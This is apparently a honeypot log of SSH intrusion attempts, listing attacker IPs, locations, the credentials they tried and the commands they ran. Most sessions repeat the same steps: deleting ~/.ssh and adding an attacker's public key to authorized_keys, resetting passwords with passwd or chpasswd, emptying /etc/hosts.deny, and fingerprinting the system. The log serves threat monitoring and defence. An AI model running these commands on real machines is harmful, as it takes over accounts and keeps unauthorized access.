$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "manu\ng8eRp2iZdNPl\ng8eRp2iZdNPl"|passwd|bash
$ Enter new UNIX password:
$ echo "manu\ng8eRp2iZdNPl\ng8eRp2iZdNPl\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_16 (108.174.147.120) β€” Jacksonville, United States Β· 1 session Β· 1 cmd
2026-06-09 03:51 EDT Β· as root/Jimster2026@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_33 (103.154.62.14) β€” CαΊ§u GiαΊ₯y, Vietnam Β· 1 session Β· 20 cmds
2026-06-09 03:45 EDT Β· as android/android
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "android\nToR6VRd2Ve8X\nToR6VRd2Ve8X"|passwd|bash
$ Enter new UNIX password:
$ echo "android\nToR6VRd2Ve8X\nToR6VRd2Ve8X\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_4 (182.254.168.74) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-06-09 02:14 EDT Β· as username/user
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "user\nZb8KMOVoNyeW\nZb8KMOVoNyeW"|passwd|bash
$ Enter new UNIX password:
$ echo "user\nZb8KMOVoNyeW\nZb8KMOVoNyeW\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wok_root_2 (14.103.118.217) β€” Haidian, China Β· 1 session Β· 20 cmds
2026-06-09 02:09 EDT Β· as facturacion/facturacion
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "facturacion\nswRFiaBK7pOt\nswRFiaBK7pOt"|passwd|bash
$ Enter new UNIX password:
$ echo "facturacion\nswRFiaBK7pOt\nswRFiaBK7pOt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 tulip_root_7 (129.121.88.64) β€” Amsterdam, The Netherlands Β· 1 session Β· 19 cmds
2026-06-08 23:10 EDT Β· as root/123qweQWE!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lw2annirCeg1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_2 (180.76.103.111) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-06-08 22:46 EDT Β· as eposta/eposta
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "eposta\n8oGrgEjUhkmR\n8oGrgEjUhkmR"|passwd|bash
$ Enter new UNIX password:
$ echo "eposta\n8oGrgEjUhkmR\n8oGrgEjUhkmR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_24 (217.216.90.208) β€” Orangeburg, United States Β· 1 session Β· 1 cmd
2026-06-08 22:04 EDT Β· as root/jimster@1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_2 (41.59.229.33) β€” Dar es Salaam, Tanzania Β· 1 session Β· 20 cmds
2026-06-08 21:23 EDT Β· as hermes/hermes
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "hermes\nw1NAtizBblsg\nw1NAtizBblsg"|passwd|bash
$ Enter new UNIX password:
$ echo "hermes\nw1NAtizBblsg\nw1NAtizBblsg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_7 (220.80.223.144) β€” Buk-gu, South Korea Β· 1 session Β· 20 cmds
2026-06-08 20:32 EDT Β· as sysadmin/sysadmin2022
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "sysadmin2022\nhsvjavBPACsZ\nhsvjavBPACsZ"|passwd|bash
$ Enter new UNIX password:
$ echo "sysadmin2022\nhsvjavBPACsZ\nhsvjavBPACsZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 seoul_root_8 (211.240.117.40) β€” Seodaemun-gu, South Korea Β· 1 session Β· 20 cmds
2026-06-08 20:32 EDT Β· as guest1/1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1234\nx1IZoLb1SJiz\nx1IZoLb1SJiz"|passwd|bash
$ Enter new UNIX password:
$ echo "1234\nx1IZoLb1SJiz\nx1IZoLb1SJiz\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_db (160.187.147.124) β€” Đẑ TαΊ»h, Vietnam Β· 1 session Β· 20 cmds
2026-06-08 20:30 EDT Β· as phys/phys
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "phys\nxWEl8gzcsLLT\nxWEl8gzcsLLT"|passwd|bash
$ Enter new UNIX password:
$ echo "phys\nxWEl8gzcsLLT\nxWEl8gzcsLLT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_5 (114.202.253.7) β€” Chungju, South Korea Β· 1 session Β· 1 cmd
2026-06-08 20:15 EDT Β· as root/jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 lantern_root_5 (58.251.252.239) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-06-08 19:17 EDT Β· as root/5nWt3P-fF4WosQm5O
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 specter_root_23 (36.93.144.67) β€” Jakarta, Indonesia Β· 3 sessions Β· 58 cmds
2026-05-16 23:54 EDT Β· as root/Qwert123456, root/gx123456, yogesh/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456\ne0ntEnBbFcHt\ne0ntEnBbFcHt"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\ne0ntEnBbFcHt\ne0ntEnBbFcHt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:6lbxqG2MBjGI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:O2fZvpfQpekL"|chpasswd|bash
🎭 shadow_2 (69.5.23.222) β€” Banguntapan, Indonesia Β· 1 session Β· 20 cmds
2026-06-08 19:10 EDT Β· as turystyka/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nPvasxyGoTppL\nPvasxyGoTppL"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nPvasxyGoTppL\nPvasxyGoTppL\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_16 (104.131.179.252) β€” Clifton, United States Β· 1 session Β· 20 cmds
2026-06-08 19:02 EDT Β· as acer/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\nE8webQZhEqEU\nE8webQZhEqEU"|passwd|bash
$ Enter new UNIX password:
$ echo "1\nE8webQZhEqEU\nE8webQZhEqEU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 eagle_root_17 (193.31.31.234) β€” Dallas, United States Β· 1 session Β· 1 cmd
2026-06-08 19:01 EDT Β· as bitcoin/bitcoin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -sm && test -d /etc/systemd/system && echo systemd_ok; id -u; sudo -n true 2>/dev/null && echo sudo_ok || true
🎭 toque_root_5 (168.138.90.7) β€” Montreal, Canada Β· 1 session Β· 20 cmds
2026-06-08 18:59 EDT Β· as won/won
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "won\nxc1NJ9GiItKs\nxc1NJ9GiItKs"|passwd|bash
$ Enter new UNIX password:
$ echo "won\nxc1NJ9GiItKs\nxc1NJ9GiItKs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 chateau_root_4 (185.252.232.247) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-06-08 18:31 EDT Β· as root/jimster2026!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_30 (123.49.60.158) β€” Dhaka, Bangladesh Β· 2 sessions Β· 39 cmds
2026-06-08 18:25 EDT Β· as root/Qwert123456, yogesh/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
